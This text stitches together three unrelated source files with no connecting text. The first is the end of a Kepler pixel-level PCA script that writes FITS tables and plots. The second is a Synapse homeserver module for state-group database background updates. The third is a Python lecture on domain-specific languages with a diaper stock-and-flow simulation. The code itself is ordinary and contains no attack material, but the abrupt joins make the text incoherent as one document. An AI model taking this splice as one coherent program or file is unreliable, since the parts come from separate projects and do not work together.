hdu1.header['TTYPE21'] = ('PCA_FLUX', 'column title: PCA-corrected flux')
hdu1.header['TFORM21'] = ('E', 'column format: float32')
hdu1.header['TUNIT21'] = ('pixel', 'column units: e-/s')
hdu1.header['TTYPE22'] = ('PCA_FLUX_NRM',
'column title: normalized PCA-corrected flux')
hdu1.header['TFORM22'] = ('E', 'column format: float32')
hdu1.header['EXTNAME'] = ('LIGHTCURVE', 'name of extension')
for i in range(len(cards1)):
if (cards1[i].keyword not in hdu1.header.keys() and
cards1[i].keyword[:4] not in ['TTYP', 'TFOR', 'TUNI', 'TDIS',
'TDIM', 'WCAX', '1CTY', '2CTY',
'1CRP', '2CRP', '1CRV', '2CRV',
'1CUN', '2CUN', '1CDE', '2CDE',
'1CTY', '2CTY', '1CDL', '2CDL',
'11PC', '12PC', '21PC', '22PC']):
hdu1.header[cards1[i].keyword] = (cards1[i].value, cards1[i].comment)
outstr.append(hdu1)
# construct output mask bitmap extension
hdu2 = pyfits.ImageHDU(maskmap)
for i in range(len(cards2)):
if cards2[i].keyword not in hdu2.header.keys():
hdu2.header[cards2[i].keyword] = (cards2[i].value,
cards2[i].comment)
else:
hdu2.header.cards[cards2[i].keyword].comment = cards2[i].comment
outstr.append(hdu2)
# construct principal component table
cols = [pyfits.Column(name='TIME', format='E', unit='BJD - 2454833',
array=time)]
for i in range(len(pcar[0, :])):
colname = 'PC' + str(i + 1)
col = pyfits.Column(name=colname, format='E', array=pcar[:, i])
cols.append(col)
hdu3 = pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))
hdu3.header['EXTNAME'] = ('PRINCIPAL_COMPONENTS', 'name of extension')
hdu3.header['TTYPE1'] = ('TIME', 'column title: data time stamps')
hdu3.header['TFORM1'] = ('D', 'data type: float64')
hdu3.header['TUNIT1'] = ('BJD - 2454833',
'column units: barycenter corrected JD')
hdu3.header['TDISP1'] = ('D12.7', 'column display format')
for i in range(len(pcar[0, :])):
hdu3.header['TTYPE' + str(i + 2)] = ("PC" + str(i + 1),
"column title: principal "
"component number " + str(i + 1))
hdu3.header['TFORM' + str(i + 2)] = ('E', 'column format: float32')
outstr.append(hdu3)
# write output file
print("Writing output file {}...".format(outfile))
outstr.writeto(outfile)
# close input structure
instr.close()
# Create PCA report
if plotpca:
npp = 7 # Number of plots per page
l = 1
repcnt = 1
for k in range(nmaps):
# First plot of every pagewith flux image,
# flux and calibrated time series
if (k % (npp - 1) == 0):
plt.figure(figsize=[10, 16])
plt.subplot2grid((npp,6), (0, 0), colspan=2)
plt.imshow(np.log10(np.flipud(pixMean.reshape(ydim,xdim)) - min(pixMean) + 1),
interpolation="nearest",cmap='RdYlBu')
plt.xticks([])
plt.yticks([])
ax1 = plt.subplot2grid((npp, 6), (0, 2), colspan=4)
px = np.copy(time) + bjdref
py = np.copy(pixseriessum)
px, xlab = kepplot.cleanx(px, logfile, verbose)
py, ylab = kepplot.cleany(py, 1.0, logfile, verbose)
kepplot.RangeOfPlot(px, py, 0.01, False)
kepplot.plot1d(px, py, cadence, '#0000ff', 1.0, '#ffff00', 0.2,
True)
py = np.copy(fluxcor)
py, ylab = kepplot.cleany(py, 1.0, logfile, verbose)
plt.plot(px, py, marker='.', color='r', linestyle='',
markersize=1.0)
kepplot.labels('', re.sub('\)', '', re.sub('Flux \(','', ylab)),
'k', 14)
plt.grid()
plt.setp(ax1.get_xticklabels(), visible=False)
# plot principal components
plt.subplot2grid((npp, 6), (l, 0), colspan=2)
plt.imshow(eigvec[k], interpolation="nearest", cmap='RdYlBu')
plt.xlim(-0.5, xdim-0.5)
plt.ylim(-0.5, ydim-0.5)
plt.xticks([])
plt.yticks([])
# The last plot on the page that should have the xlabel
if (k % (npp - 1) == npp - 2 or k == nvecin - 1):
plt.subplot2grid((npp, 6), (l, 2), colspan=4)
py = np.copy(model[:, k])
kepplot.RangeOfPlot(px, py, 0.01, False)
kepplot.plot1d(px, py, cadence, 'r', 1.0, 'g', 0.2, True)
kepplot.labels(xlab, 'PC ' + str(k + 1), 'k', 14)
plt.grid()
plt.tight_layout()
l = 1
plt.savefig(re.sub('.png', '_%d.png' % repcnt,repname))
repcnt += 1
# The other plots on the page that should have no xlabel
else:
ax2 = plt.subplot2grid((npp, 6), (l, 2), colspan=4)
py = np.copy(model[:, k])
kepplot.RangeOfPlot(px, py, 0.01, False)
kepplot.plot1d(px, py, cadence, 'r', 1.0, 'g', 0.2, True)
kepplot.labels('', 'PC ' + str(k + 1), 'k', 14)
plt.grid()
plt.setp(ax2.get_xticklabels(), visible=False)
plt.tight_layout()
l=l+1
plt.savefig(re.sub('.png', '_%d.png' % repcnt, repname))
# plot style and size
if plotpca:
plt.figure()
plt.clf()
# plot aperture photometry and PCA corrected data
ax = kepplot.location([0.06, 0.54, 0.93, 0.43])
px = np.copy(time) + bjdref
py = np.copy(pixseriessum)
px, xlab = kepplot.cleanx(px, logfile, verbose)
py, ylab = kepplot.cleany(py, 1.0, logfile, verbose)
kepplot.RangeOfPlot(px, py, 0.01, False)
kepplot.plot1d(px, py, cadence, '#0000ff', 1.0, '#ffff00', 0.2, True)
py = np.copy(fluxcor)
py, ylab = kepplot.cleany(py, 1.0, logfile, verbose)
kepplot.plot1d(px, py, cadence, 'r', 2, '#ffff00', 0.0, True)
plt.setp(plt.gca(), xticklabels=[])
kepplot.labels('', ylab, 'k', 14)
plt.grid()
# plot aperture photometry and PCA corrected data
ax = kepplot.location([0.06, 0.09, 0.93, 0.43])
yr = np.array([], 'float32')
npc = min([6, nrem])
for i in range(npc - 1, -1, -1):
py = pcar[:, i] * c[i]
py, ylab = kepplot.cleany(py, 1.0, logfile, verbose)
cl = float(i) / (float(npc))
kepplot.plot1d(px, py, cadence, [1.0 - cl, 0.0, cl], 2, '#ffff00',
0.0, True)
yr = np.append(yr, py)
y1 = max(yr)
y2 = -min(yr)
kepplot.RangeOfPlot(px, np.array([-y1, y1, -y2, y2]), 0.01, False)
kepplot.labels(xlab, 'Principal Components', 'k', 14)
plt.grid()
# save plot to file
plt.savefig(repname)
# render plot
plt.show()
# stop time
kepmsg.clock('KEPPCA ended at', logfile, verbose)
def reject_outliers(data, m):
"""Outlier rejection for computing robust mean"""
try:
return data[np.abs(data - np.nanmean(data)) < m * np.std(data)]
except:
print("Warning: Could not reject outliers.")
return data
def mad(data):
"""
Mean absolute deviation function used for fitting the PCA components to
the data and subtracting them out
"""
return np.nanmean(np.absolute(data - np.nanmean(data)))
def keppca_main():
import argparse
parser = argparse.ArgumentParser(
description='Pixel-level principal component analysis of time series',
formatter_class=PyKEArgumentHelpFormatter)
parser.add_argument('infile', help='Name of input target pixel FITS file',
type=str)
parser.add_argument('--outfile',
help=('Name of FITS file to output.'
' If None, outfile is infile-keppca.'),
default=None)
parser.add_argument('--maskfile', help='Name of mask defintion ASCII file',
default='ALL', type=str)
parser.add_argument('--components', default='1-3',
help='Principal components to be removed', type=str)
parser.add_argument('--plotpca', action='store_true',
help='Create PCA plots?')
parser.add_argument('--nmaps', default=10,
help='Number of principal components to include in report',
type=int)
parser.add_argument('--overwrite', action='store_true',
help='Overwrite output file?')
parser.add_argument('--verbose', action='store_true',
help='Write to a log file?')
parser.add_argument('--logfile', '-l', help='Name of ascii log file',
default='keppca.log', dest='logfile', type=str)
args = parser.parse_args()
keppca(args.infile, args.outfile, args.maskfile, args.components,
args.plotpca, args.nmaps, args.overwrite, args.verbose, args.logfile)
|
|
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import TYPE_CHECKING, Dict, List, Mapping, Optional, Tuple, Union
from synapse.storage._base import SQLBaseStore
from synapse.storage.database import (
DatabasePool,
LoggingDatabaseConnection,
LoggingTransaction,
)
from synapse.storage.engines import PostgresEngine
from synapse.storage.state import StateFilter
from synapse.types import MutableStateMap, StateMap
if TYPE_CHECKING:
from synapse.server import HomeServer
logger = logging.getLogger(__name__)
MAX_STATE_DELTA_HOPS = 100
class StateGroupBackgroundUpdateStore(SQLBaseStore):
"""Defines functions related to state groups needed to run the state background
updates.
"""
def _count_state_group_hops_txn(
self, txn: LoggingTransaction, state_group: int
) -> int:
"""Given a state group, count how many hops there are in the tree.
This is used to ensure the delta chains don't get too long.
"""
if isinstance(self.database_engine, PostgresEngine):
sql = """
WITH RECURSIVE state(state_group) AS (
VALUES(?::bigint)
UNION ALL
SELECT prev_state_group FROM state_group_edges e, state s
WHERE s.state_group = e.state_group
)
SELECT count(*) FROM state;
"""
txn.execute(sql, (state_group,))
row = txn.fetchone()
if row and row[0]:
return row[0]
else:
return 0
else:
# We don't use WITH RECURSIVE on sqlite3 as there are distributions
# that ship with an sqlite3 version that doesn't support it (e.g. wheezy)
next_group: Optional[int] = state_group
count = 0
while next_group:
next_group = self.db_pool.simple_select_one_onecol_txn(
txn,
table="state_group_edges",
keyvalues={"state_group": next_group},
retcol="prev_state_group",
allow_none=True,
)
if next_group:
count += 1
return count
def _get_state_groups_from_groups_txn(
self,
txn: LoggingTransaction,
groups: List[int],
state_filter: Optional[StateFilter] = None,
) -> Mapping[int, StateMap[str]]:
state_filter = state_filter or StateFilter.all()
results: Dict[int, MutableStateMap[str]] = {group: {} for group in groups}
where_clause, where_args = state_filter.make_sql_filter_clause()
# Unless the filter clause is empty, we're going to append it after an
# existing where clause
if where_clause:
where_clause = " AND (%s)" % (where_clause,)
if isinstance(self.database_engine, PostgresEngine):
# Temporarily disable sequential scans in this transaction. This is
# a temporary hack until we can add the right indices in
txn.execute("SET LOCAL enable_seqscan=off")
# The below query walks the state_group tree so that the "state"
# table includes all state_groups in the tree. It then joins
# against `state_groups_state` to fetch the latest state.
# It assumes that previous state groups are always numerically
# lesser.
# The PARTITION is used to get the event_id in the greatest state
# group for the given type, state_key.
# This may return multiple rows per (type, state_key), but last_value
# should be the same.
sql = """
WITH RECURSIVE state(state_group) AS (
VALUES(?::bigint)
UNION ALL
SELECT prev_state_group FROM state_group_edges e, state s
WHERE s.state_group = e.state_group
)
SELECT DISTINCT ON (type, state_key)
type, state_key, event_id
FROM state_groups_state
WHERE state_group IN (
SELECT state_group FROM state
) %s
ORDER BY type, state_key, state_group DESC
"""
for group in groups:
args: List[Union[int, str]] = [group]
args.extend(where_args)
txn.execute(sql % (where_clause,), args)
for row in txn:
typ, state_key, event_id = row
key = (typ, state_key)
results[group][key] = event_id
else:
max_entries_returned = state_filter.max_entries_returned()
# We don't use WITH RECURSIVE on sqlite3 as there are distributions
# that ship with an sqlite3 version that doesn't support it (e.g. wheezy)
for group in groups:
next_group: Optional[int] = group
while next_group:
# We did this before by getting the list of group ids, and
# then passing that list to sqlite to get latest event for
# each (type, state_key). However, that was terribly slow
# without the right indices (which we can't add until
# after we finish deduping state, which requires this func)
args = [next_group]
args.extend(where_args)
txn.execute(
"SELECT type, state_key, event_id FROM state_groups_state"
" WHERE state_group = ? " + where_clause,
args,
)
results[group].update(
((typ, state_key), event_id)
for typ, state_key, event_id in txn
if (typ, state_key) not in results[group]
)
# If the number of entries in the (type,state_key)->event_id dict
# matches the number of (type,state_keys) types we were searching
# for, then we must have found them all, so no need to go walk
# further down the tree... UNLESS our types filter contained
# wildcards (i.e. Nones) in which case we have to do an exhaustive
# search
if (
max_entries_returned is not None
and len(results[group]) == max_entries_returned
):
break
next_group = self.db_pool.simple_select_one_onecol_txn(
txn,
table="state_group_edges",
keyvalues={"state_group": next_group},
retcol="prev_state_group",
allow_none=True,
)
# The results shouldn't be considered mutable.
return results
class StateBackgroundUpdateStore(StateGroupBackgroundUpdateStore):
STATE_GROUP_DEDUPLICATION_UPDATE_NAME = "state_group_state_deduplication"
STATE_GROUP_INDEX_UPDATE_NAME = "state_group_state_type_index"
STATE_GROUPS_ROOM_INDEX_UPDATE_NAME = "state_groups_room_id_idx"
def __init__(
self,
database: DatabasePool,
db_conn: LoggingDatabaseConnection,
hs: "HomeServer",
):
super().__init__(database, db_conn, hs)
self.db_pool.updates.register_background_update_handler(
self.STATE_GROUP_DEDUPLICATION_UPDATE_NAME,
self._background_deduplicate_state,
)
self.db_pool.updates.register_background_update_handler(
self.STATE_GROUP_INDEX_UPDATE_NAME, self._background_index_state
)
self.db_pool.updates.register_background_index_update(
self.STATE_GROUPS_ROOM_INDEX_UPDATE_NAME,
index_name="state_groups_room_id_idx",
table="state_groups",
columns=["room_id"],
)
async def _background_deduplicate_state(
self, progress: dict, batch_size: int
) -> int:
"""This background update will slowly deduplicate state by reencoding
them as deltas.
"""
last_state_group = progress.get("last_state_group", 0)
rows_inserted = progress.get("rows_inserted", 0)
max_group = progress.get("max_group", None)
BATCH_SIZE_SCALE_FACTOR = 100
batch_size = max(1, int(batch_size / BATCH_SIZE_SCALE_FACTOR))
if max_group is None:
rows = await self.db_pool.execute(
"_background_deduplicate_state",
None,
"SELECT coalesce(max(id), 0) FROM state_groups",
)
max_group = rows[0][0]
def reindex_txn(txn: LoggingTransaction) -> Tuple[bool, int]:
new_last_state_group = last_state_group
for count in range(batch_size):
txn.execute(
"SELECT id, room_id FROM state_groups"
" WHERE ? < id AND id <= ?"
" ORDER BY id ASC"
" LIMIT 1",
(new_last_state_group, max_group),
)
row = txn.fetchone()
if row:
state_group, room_id = row
if not row or not state_group:
return True, count
txn.execute(
"SELECT state_group FROM state_group_edges"
" WHERE state_group = ?",
(state_group,),
)
# If we reach a point where we've already started inserting
# edges we should stop.
if txn.fetchall():
return True, count
txn.execute(
"SELECT coalesce(max(id), 0) FROM state_groups"
" WHERE id < ? AND room_id = ?",
(state_group, room_id),
)
# There will be a result due to the coalesce.
(prev_group,) = txn.fetchone() # type: ignore
new_last_state_group = state_group
if prev_group:
potential_hops = self._count_state_group_hops_txn(txn, prev_group)
if potential_hops >= MAX_STATE_DELTA_HOPS:
# We want to ensure chains are at most this long,#
# otherwise read performance degrades.
continue
prev_state_by_group = self._get_state_groups_from_groups_txn(
txn, [prev_group]
)
prev_state = prev_state_by_group[prev_group]
curr_state_by_group = self._get_state_groups_from_groups_txn(
txn, [state_group]
)
curr_state = curr_state_by_group[state_group]
if not set(prev_state.keys()) - set(curr_state.keys()):
# We can only do a delta if the current has a strict super set
# of keys
delta_state = {
key: value
for key, value in curr_state.items()
if prev_state.get(key, None) != value
}
self.db_pool.simple_delete_txn(
txn,
table="state_group_edges",
keyvalues={"state_group": state_group},
)
self.db_pool.simple_insert_txn(
txn,
table="state_group_edges",
values={
"state_group": state_group,
"prev_state_group": prev_group,
},
)
self.db_pool.simple_delete_txn(
txn,
table="state_groups_state",
keyvalues={"state_group": state_group},
)
self.db_pool.simple_insert_many_txn(
txn,
table="state_groups_state",
keys=(
"state_group",
"room_id",
"type",
"state_key",
"event_id",
),
values=[
(state_group, room_id, key[0], key[1], state_id)
for key, state_id in delta_state.items()
],
)
progress = {
"last_state_group": state_group,
"rows_inserted": rows_inserted + batch_size,
"max_group": max_group,
}
self.db_pool.updates._background_update_progress_txn(
txn, self.STATE_GROUP_DEDUPLICATION_UPDATE_NAME, progress
)
return False, batch_size
finished, result = await self.db_pool.runInteraction(
self.STATE_GROUP_DEDUPLICATION_UPDATE_NAME, reindex_txn
)
if finished:
await self.db_pool.updates._end_background_update(
self.STATE_GROUP_DEDUPLICATION_UPDATE_NAME
)
return result * BATCH_SIZE_SCALE_FACTOR
async def _background_index_state(self, progress: dict, batch_size: int) -> int:
def reindex_txn(conn: LoggingDatabaseConnection) -> None:
conn.rollback()
if isinstance(self.database_engine, PostgresEngine):
# postgres insists on autocommit for the index
conn.set_session(autocommit=True)
try:
txn = conn.cursor()
txn.execute(
"CREATE INDEX CONCURRENTLY state_groups_state_type_idx"
" ON state_groups_state(state_group, type, state_key)"
)
txn.execute("DROP INDEX IF EXISTS state_groups_state_id")
finally:
conn.set_session(autocommit=False)
else:
txn = conn.cursor()
txn.execute(
"CREATE INDEX state_groups_state_type_idx"
" ON state_groups_state(state_group, type, state_key)"
)
txn.execute("DROP INDEX IF EXISTS state_groups_state_id")
await self.db_pool.runWithConnection(reindex_txn)
await self.db_pool.updates._end_background_update(
self.STATE_GROUP_INDEX_UPDATE_NAME
)
return 1
|
|
from __future__ import print_function, division
import sys
sys.dont_write_bytecode = True
from ok import *
"""
<em>(I keep being asked... where to get models? where to get models? After this lecture, you will have
access to hundreds of models as well as methods for interviewing humans to learn their models.)</em>
# Domain-Specific Languages 101 (in Python)
This files shows an example of a small object-based DSL (domain-specific language) in Python.
In the language, all the tedious stuff is implemented in superclasses, letting
users express their knowledge in simple succinct subclasses.
The example here will be compartmental modeling and is
adapted from some excellent code from
[Abraham Flaxman](https://gist.github.com/aflaxman/4121076#file-sdm_diaper_delivery-ipynb).
Note that students of CSx91 have ready access to many
[compartmental models about software systems](http://unbox.org/doc/optimalML/madachyBook.pdf) ranging from

to the very complex.

## Theory
<img align=right width=300 src="http://www.quickmeme.com/img/23/23d727872d13ac2b652ea175ac6b63a1792688690e9eb6f7d7d0a82bc1ed94c5.jpg">
Does your language pass the _elbow test_? Do your business users elbow you of the way
in their haste to fix what is obviously wrong with your code?
No? Then you obviously:
+ You are not speaking their language.
+ You've lost that an
entire community that might have been able to audit,
verify, and evolve your code.
Enter domain-specific languages (DSLs). DSLs have also been called:
+ [little languages](http://staff.um.edu.mt/afra1/seminar/little-languages.pdf);
+ micro-languages,
+ application languages,
+ very high level languages.
Example DSLs:
+ SQL
+ AWK (unix text reporting language)
+ Regular expressions
<img align=right width=400 src="http://api.ning.com/files/tcX1134PNX2h4QP7dIMahJNNnQqsDMD0tM6jzv6Da8-r1vv1wLntg3SRQsn0r6kCmIXa2Bp4VSaSFgRLkQjfdkleLqeuMgdJ/aliensymbols1.bmp">
DSLs are useful since
different representations of the same concepts can make certain inferences easier. Here's Douglas
Hofstadter from his book _Godel, Esher, Bach:_
+ When you confront a (system) that you know nothing of,... your problem is how to assign interpretations to its symbols in a meaningful way...:
+ You may make several tentative stabs in the dark before finding a good set of words to associate with the symbols.
+ It is very similar to attempts to crack a code, or to decipher inscriptions in an unknown language...
+ When you hit a right choice... all of a sudden things just feel right, and work speeds up enormously.
+ Pretty soon everything falls into place."
Here's James Martin from his book _Design of Real-time Computer Systems_:
+ We must develop languages that the scientist, the architect, the teacher, and the layman can use without being computer experts.
+ The language for each user must be as natural as possible to him.
+ The statistician must talk to his terminal in the language of statistics.
+ The civil engineer must use the language of civil engineering.
+ When a man (sic) learns his profession he must learn the problem-oriented languages to go with that profession.
<img align=right width=400 src="http://image.slidesharecdn.com/letmakeuserhappy-130613095746-phpapp01/95/let-make-user-happy-1-638.jpg?cb=1371117649">
A DSL is a very high-level language that a user can learn and use in less than a day. Such productivity can only be achieved by tailoring the language to the special needs and skills of a particular class of users in a particular domain.
So one way to find DSL is listen to experts in some field commenting on their processing. Often that processing
has repeated domain-specific idioms:
+ Idioms= Methods imposed by programmers to handle common forms, procedures.
+ E.g. Ensure data is saved before the window is closed.
+ E.g. Before conducting expensive tests, perform cheap tests that can rule out need for expensive tests.
In a DSL-based software development process, the analyst:
+ Identifies the users and their tasks;
+ Identifies the common idioms used by those users;
+ Invents a little language to handle those idioms;
+ Generates sample sentences in that language;
+ Shows those sentences to the user and trains them how to write their own.
That is, instead of the analyst writing the application, the analysts writes tools that let a user community write and maintain their own knowledge.
The benefits of DSL (productivity, explanatory, ownership by the users) can be out-weighed by the cost of building the DSL.
Two ways to build a DSL:
+ External DSL: code is a string which is read, parsed, and executed by (say) Python.
+ E.g. see [PyParsing](http://www.slideshare.net/Siddhi/creating-domain-specific-languages-in-python)
+ Internal DSL: using features of the language, enable people to write code that resembles domain syntax.
+ See decorators, context managers
+ Code the idioms in general superclasses;
+ Leave the domain-specific stuff for subclasses
## Writing your own DSL in Python
### Decorators
A test engine, as a Python decorator
```python
def ok(*lst):
print "### ",lst[0].__name__
for one in lst: unittest(one)
return one
class unittest:
tries = fails = 0 # tracks the record so far
@staticmethod
def score():
t = unittest.tries
f = unittest.fails
return "# TRIES= %s FAIL= %s %%PASS = %s%%" % (
t,f,int(round(t*100/(t+f+0.001))))
def __init__(i,test):
unittest.tries += 1
try:
test()
except Exception,e:
unittest.fails += 1
i.report(test)
def report(i,test):
import traceback
print traceback.format_exc()
print unittest.score(),':',test.__name__
```
### Context Managers
Here's an idiom for writing HTML:
```Python
from contextlib import contextmanager
@contextmanager
def tag(name):
print "<%s>" % name
yield
print "</%s>" % name
>>> with tag("h1"):
... print "foo"
...
<h1>
foo
</h1>
```
Another example (print runtime of things):
```python
@contextmanager
def duration():
t1 = time.time()
yield
t2 = time.time()
print("\n" + "-" * 72)
print("# Runtime: %.3f secs" % (t2-t1))
def _durationDemo():
with duration():
##do something
```
Yet another example (always close things):
```python
from contextlib import contextmanager
from contextlib import closing
import urllib
@contextmanager
def closing(thing):
try:
yield thing
finally:
thing.close()
with closing(urllib.urlopen('http://www.python.org')) as page:
for line in page:
print line
```
## Other Techniques
Use the sub-classing trick (this works in Python, or any other OO language).
+ Place the generic processing in superclasses.
+ Users write the particulars of their domain in subclasses.
+ Example, see below.
See also [Implementing Domain Specific Languages In Python](http://www.pyvideo.org/video/251/pycon-2010--implementing-domain-specific-language) (very long!).
## SAF: Stock and Flow (Compartmental Modeling in Python)
From Wikipedia:
+ Economics, business, accounting, and related
fields often distinguish between quantities that are
_stocks_ and those that are _flows_. These differ in
their units of measurement.
+ A stock variable is
measured at one specific time, and represents a
quantity existing at that point in time (say,
December 31, 2004), which may have accumulated in
the past.
+ A flow variable is measured over an
interval of time. Therefore a flow would be measured
per unit of time (say a year). Flow is roughly
analogous to rate or speed in this sense.
+ Examples:
+ A person or country might have stocks of money, financial assets, liabilities, wealth, real means of production, capital, inventories, and human capital (or labor power).
+ Flow magnitudes include income, spending, saving, debt repayment, fixed investment, inventory investment, and labor utilization.These differ in their units of measurement.
+ Formally:
+ A stock (or "level variable") in this broader sense is some entity that is accumulated over time by inflows and/or depleted by outflows. Stocks can only be changed via flows. Mathematically a stock can be seen as an accumulation or integration of flows over time - with outflows subtracting from the stock. Stocks typically have a certain value at each moment of time - e.g. the number of population at a certain moment.
+ flow (or "rate") changes a stock over time.
Usually we can clearly distinguish inflows (adding to the stock)
and outflows (subtracting from the stock). Flows typically
are measured over a certain interval of time - e.g., the number
of births over a day or month.
For practical purposes, it may be necessary to add _auxillary variables_ to handle some intermediaries (so, in the following,
we can see _nominal productivity_).

Note the `sources` and `sinks` in the above diagram: these are infinite stocks that can generate or receive infinite
volumes.
So, in the following code, look for
```python
S,A,F = Stock, Aux, Flow
```
## Example: Diapers
```
q +-----+ r +-----+
---->| C |---->| D |--> s
^ +-----+ +-+---+
| |
+-----------------+
C = stock of clean diapers
D = stock of dirty diapers
q = inflow of clean diapers
r = flow of clean diapers to dirty diapers
s = out-flow of dirty diapers
```
This is modeled as one `have` methods that initializes:
+ `C,D` as a `Stock` with initial levels 100,0;
+ `q,r,s` as a `Flow` with initial rates of 0,8,0
and as a `step` method that takes state `u`
and computes a new state `v` at
time `t+dt`.
```python
class Diapers(Model):
def have(i):
return o(C = S(100), D = S(0),
q = F(0), r = F(8), s = F(0))
def step(i,dt,t,u,v):
def saturday(x): return int(x) % 7 == 6
v.C += dt*(u.q - u.r)
v.D += dt*(u.r - u.s)
v.q = 70 if saturday(t) else 0
v.s = u.D if saturday(t) else 0
if t == 27: # special case (the day i forget)
v.s = 0
```
Note that the model is just some Python code so we can
introduce any shortcut function (e.g. `saturday`). To write the Python:
+ sum the in and outflows around each stock;
+ multiply that by the time tick `dt`
+ and add the result back to the stock
+ e.g. `v.C += dt*(u.q - u.r)`
## Implementation
### Some set up code
"""
import random
r = random.random
isa = isinstance
class o:
"""Emulate Javascript's uber simple objects.
Note my convention: I use "`i`" not "`this`."""
def has(i) : return i.__dict__
def keys(i) : return i.has().keys()
def items(i) : return i.has().items()
def __init__(i,**d) : i.has().update(d)
def __setitem__(i,k,v) : i.has()[k] = v
def __getitem__(i,k) : return i.has()[k]
def __repr__(i) : return 'o'+str(i.has())
def copy(i):
j = o()
for k in i.has(): j[k] = i[k]
return j
def asList(i,keys=[]):
keys = keys or i.keys()
return [i[k] for k in keys]
"""
### Stocks, Flows, Aux are Subclasses of `Has`
`Has` is a named thing that knows the `lo` and `hi` values
(and
if values fall outside that range, this class can `restrain` them in).
"""
class Has:
def __init__(i,init,lo=0,hi=100):
i.init,i.lo,i.hi = init,lo,hi
def restrain(i,x):
return max(i.lo,
min(i.hi, x))
def rank(i):
"Trick to sort together columns of the same type."
return 0
def __repr__(i):
return str(dict(what=i.__class__.__name__,
name= i.name,init= i.init,
lo = i.lo, hi = i.hi))
class Flow(Has) :
def rank(i): return 3
class Stock(Has):
def rank(i): return 1
class Aux(Has) :
def rank(i): return 2
"""
As promised:
"""
S,A,F = Stock,Aux,Flow
"""
### `Model`s contain `Stock`s, `Flow`s and `Aux`
When we `run` a model:
1. We keep the state vectors over all times in the `keep` list;
2. In that list, we store the values of the `Stock`s, `Flow`s, and `Aux` values;
3. At each time tick, all values are kept in the same order
+ Determined by the `keys` variable.
4. Between each time tick, we `restrain` any values that have gone
out of scope.
"""
class Model:
def state(i):
"""To create a state vector, we create
one slot for each name in 'have'."""
tmp=i.have()
for k,v in tmp.has().items():
v.name = k
return tmp
def run(i,dt=1,tmax=30):
"""For time up to 'tmax', increment 't'
by 'dt' and 'step' the model."""
t,b4 = 0, o()
keep = [] ## 1
state = i.state()
for k,a in state.items():
b4[k] = a.init
keys = sorted(state.keys(), ## 3
key=lambda z: state[z].rank())
keep = [["t"] + keys,
[0] + b4.asList(keys)]
while t < tmax:
now = b4.copy()
i.step(dt,t,b4,now)
for k in state.keys():
now[k] = state[k].restrain(now[k]) ## 4
keep += [[t] + now.asList(keys)] ## 2
t += dt
b4 = now
return keep
"""
### Support Utilities
Here's a cool trick for printing lists of lists... but
only showing new values if they are different to the row above.
For example, with `printm`, our model outputs:
```
### _diapers1
t | C | D | q | r | s
0 | 100 | 0 | 0 | 8 | 0
. | 92 | 8 | . | . | .
1 | 84 | 16 | . | . | .
2 | 76 | 24 | . | . | .
3 | 68 | 32 | . | . | .
4 | 60 | 40 | . | . | .
5 | 52 | 48 | . | . | .
6 | 44 | 56 | 70 | . | 48
7 | 100 | 16 | 0 | . | 0
8 | 92 | 24 | . | . | .
9 | 84 | 32 | . | . | .
10 | 76 | 40 | . | . | .
11 | 68 | 48 | . | . | .
12 | 60 | 56 | . | . | .
13 | 52 | 64 | 70 | . | 56
14 | 100 | 16 | 0 | . | 0
15 | 92 | 24 | . | . | .
16 | 84 | 32 | . | . | .
17 | 76 | 40 | . | . | .
18 | 68 | 48 | . | . | .
19 | 60 | 56 | . | . | .
20 | 52 | 64 | 70 | . | 56
21 | 100 | 16 | 0 | . | 0
22 | 92 | 24 | . | . | .
23 | 84 | 32 | . | . | .
24 | 76 | 40 | . | . | .
25 | 68 | 48 | . | . | .
26 | 60 | 56 | . | . | .
27 | 52 | 64 | 70 | . | .
28 | 100 | 72 | 0 | . | .
29 | 92 | 80 | . | . | .
```
Otherwise, the output is a little harder to read:
```
## _diapers1
t | C | D | q | r | s
0 | 100 | 0 | 0 | 8 | 0
0 | 92 | 8 | 0 | 8 | 0
1 | 84 | 16 | 0 | 8 | 0
2 | 76 | 24 | 0 | 8 | 0
3 | 68 | 32 | 0 | 8 | 0
4 | 60 | 40 | 0 | 8 | 0
5 | 52 | 48 | 0 | 8 | 0
6 | 44 | 56 | 70 | 8 | 48
7 | 100 | 16 | 0 | 8 | 0
8 | 92 | 24 | 0 | 8 | 0
9 | 84 | 32 | 0 | 8 | 0
10 | 76 | 40 | 0 | 8 | 0
11 | 68 | 48 | 0 | 8 | 0
12 | 60 | 56 | 0 | 8 | 0
13 | 52 | 64 | 70 | 8 | 56
14 | 100 | 16 | 0 | 8 | 0
15 | 92 | 24 | 0 | 8 | 0
16 | 84 | 32 | 0 | 8 | 0
17 | 76 | 40 | 0 | 8 | 0
18 | 68 | 48 | 0 | 8 | 0
19 | 60 | 56 | 0 | 8 | 0
20 | 52 | 64 | 70 | 8 | 56
21 | 100 | 16 | 0 | 8 | 0
22 | 92 | 24 | 0 | 8 | 0
23 | 84 | 32 | 0 | 8 | 0
24 | 76 | 40 | 0 | 8 | 0
25 | 68 | 48 | 0 | 8 | 0
26 | 60 | 56 | 0 | 8 | 0
27 | 52 | 64 | 70 | 8 | 0
28 | 100 | 72 | 0 | 8 | 0
29 | 92 | 80 | 0 | 8 | 0
```
"""
def printm(matrix,less=True):
"""Print a list of list, only showing changes
in each column (if less is True)."""
def ditto(m,mark="."):
def worker(lst):
out = []
for i,now in enumerate(lst):
before = old.get(i,None) # get old it if exists
out += [mark if before == now else now]
old[i] = now # next time, 'now' is the 'old' value
return out # the lst with ditto marks inserted
old = {}
return [worker(row) for row in m]
matrix = ditto(matrix) if less else matrix
s = [[str(e) for e in row] for row in matrix]
lens = [max(map(len, col)) for col in zip(*s)]
fmt = ' | '.join('{{:{}}}'.format(x) for x in lens)
for row in [fmt.format(*row) for row in s]:
print(row)
"""
### Model
"""
class Diapers(Model):
def have(i):
return o(C = S(100), D = S(0),
q = F(0), r = F(8), s = F(0))
def step(i,dt,t,u,v):
def saturday(x): return int(x) % 7 == 6
v.C += dt*(u.q - u.r)
v.D += dt*(u.r - u.s)
v.q = 70 if saturday(t) else 0
v.s = u.D if saturday(t) else 0
if t == 27: # special case (the day i forget)
v.s = 0
"""
